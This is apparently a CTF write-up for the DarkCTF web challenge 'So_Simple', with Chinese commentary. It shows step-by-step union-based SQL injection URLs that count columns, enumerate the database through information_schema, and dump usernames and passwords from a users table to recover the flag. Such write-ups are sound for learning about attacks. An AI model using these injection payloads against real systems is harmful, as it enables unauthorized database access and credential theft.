Web/So_Simple - HackMD

###### tags: `DarkCTF` `Web` # Web/So_Simple http://web.darkarmy.xyz:30001 ### description - "Try Harder" may be You get flag manually - Try id as parameter - LINK: http://web.darkarmy.xyz:30001 - 連上後先測試欄位數 - `http://web.darkarmy.xyz:30001/?id=8'union select 1,2 -- -` - ![](https://i.imgur.com/jbeQMuj.png) - `http://web.darkarmy.xyz:30001/?id=8'union select 1,2,3 -- -` - union select到3的時候沒有再報錯，代表欄位為3 - 經由測試發現三個欄位名為username,password,id - ![](https://i.imgur.com/B7kLa3V.png) - 撈資料庫名 - 因為database預設存放在information_schema.schemata內 - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(schema_name separator '~') from information_schema.schemata -- -` - ![](https://i.imgur.com/AnNRmOr.png) - 撈資料表名 - 資料表存放在information_schema.tables內 - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(table_name separator '~') from information_schema.tables where table_schema='id14831952_security' -- -` - 撈資料欄位名 - 資料欄位存放在information_schema.columns內 - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(column_name separator '~') from information_schema.columns where table_name='users' -- -` - 從欄位抓出內容 - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(username separator '~') from users -- -` - 抓欄位內容 - `http://web.darkarmy.xyz:30001/?id='union select 1,password,id from users where username='flag` - ![](https://i.imgur.com/ncOsvoX.png)